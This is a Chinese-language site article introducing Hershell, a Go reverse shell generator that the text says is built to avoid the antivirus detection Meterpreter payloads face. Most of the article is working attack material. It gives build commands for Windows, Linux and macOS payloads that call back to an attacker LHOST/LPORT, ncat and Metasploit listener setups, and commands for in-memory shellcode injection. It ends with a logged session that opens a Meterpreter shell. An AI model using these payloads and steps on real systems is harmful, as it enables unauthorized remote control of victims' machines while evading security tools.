您好,登錄后才能下訂單哦!
小編給大家分享一下Hershell是一款什么生成器,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
Hershell是一款功能強大的跨平臺反向Shell生成器,該工具使用Go語言開發,基于TCP反向Shell實現其功能。
該工具使用了TLS來保障數據通訊的安全性,并且提供了證書公共密鑰指紋綁定功能來防止通信數據被攔截。
Hershell的當前版本支持以下操作系統:
Windows
Linux
macOS
FreeBSD
雖然Meterpreter Payload有時也能用,但是這種方法很容易被反病毒產品檢測到。因此,Hershell便應運而生,它可以給我們提供一個基于TCP的反向Shell,而且能夠支持各種不同的操作系統平臺。
Hershell使用Go語言開發,我們首先需要按照Go官方手冊在我們的設備上完成Go環境的搭建,并設置好$GOPATH環境變量。
接下來,運行下列命令來獲取項目源碼:
go get github.com/lesnuages/hershell
在構建Payload時,我們可以選擇使用已提供的Makefile來完成構建。此時,我們需要設置以下環境變量:
GOOS : 目標操作系統
GOARCH : 目標架構
LHOST : 攻擊者IP或主機域名
LPORT : 監聽器端口
當然了,我們也在Makefile中提供了一些可供參考的變量值:
depends : 生成服務器證書(反向Shell需要使用到)
windows32 : 構建一個32位Windows可執行程序(PE 32位)
windows64 : 構建一個64位Windows可執行程序(PE 64位)
linux32 : 構建一個32位Linux可執行程序(ELF 32位)
linux64 : 構建一個64位Linux可執行程序(ELF 64位)
macos32 : 構建一個32位macOS可執行程序(Mach-O)
macos64 : 構建一個64位macOS可執行程序(Mach-O)
針對上述列表中的目標平臺,我們還需要設置LHOST和LPORT這兩個環境變量。
代碼開始執行之后,工具將給我們提供一個遠程Shell,它是一個自定義的交互式Shell,允許我們通過Windows上的cmd.exe或Unix設備中的/bin/sh來執行系統命令。
Hershell支持的部分特定命令如下表所示:
run_shell : 獲取系統Shell
inject <base64 shellcode> : 向相同進程內存中注入一個shellcode(Base64編碼),并執行代碼。
meterpreter [tcp|http|https] IP:PORT :與多個處理器建立連接并從Metasploit獲取第二階段的反向TCP、HTTP或HTTPS Meterpreter,然后在內存中執行Shellcode(該功能目前僅支持Windows平臺)。
exit : 退出程序
首先,我們需要使用下面的命令生成一個有效的證書:
$ make depends openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem Generating a 4096 bit RSA private key ....................................................................................++ .....++ writing new private key to 'server.key'----- cat server.key >> server.pem
# Predifined 32 bit target$ make windows32 LHOST=192.168.0.12 LPORT=1234# Predifined 64 bit target$ make windows64 LHOST=192.168.0.12 LPORT=1234
# Predifined 32 bit target$ make linux32 LHOST=192.168.0.12 LPORT=1234# Predifined 64 bit target$ make linux64 LHOST=192.168.0.12 LPORT=1234
$ make macos LHOST=192.168.0.12 LPORT=1234
我們可以使用各種工具來處理傳入的連接,比如說:
socat
ncat
openssl服務器模塊
Metasploit的各種handler (python/shell_reverse_tcp_ssl payload)
下面是ncat的使用樣例:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 172.16.122.105. Ncat: Connection from 172.16.122.105:47814. [hershell]> whoami desktop-3pvv31a\lab
注意:目前該功能僅支持在Windows平臺上使用。
該工具的Meterpreter使用場景目前僅支持下列Payload:
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
windows/x64/meterpreter/reverse_http
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
當你選擇使用某個Payload之后,別忘了選擇正確的傳輸端口(tcp、http或https)。
MeterpreterHandler使用樣例如下:
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler [14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https [14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105 lhost => 172.16.122.105 [14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443 lport => 8443 [14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem HandlerSSLCert => ./server.pem [14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443 [14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
接下來,在hershell中,使用meterpreter命令:
[hershell]> meterpreter https 172.16.122.105:8443
此時,我們將能夠在msfconsole中獲取到新的Meterpreter會話:
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ... [*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100 [14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15) [14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: DESKTOP-3PVV31A\lab
以上是“Hershell是一款什么生成器”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。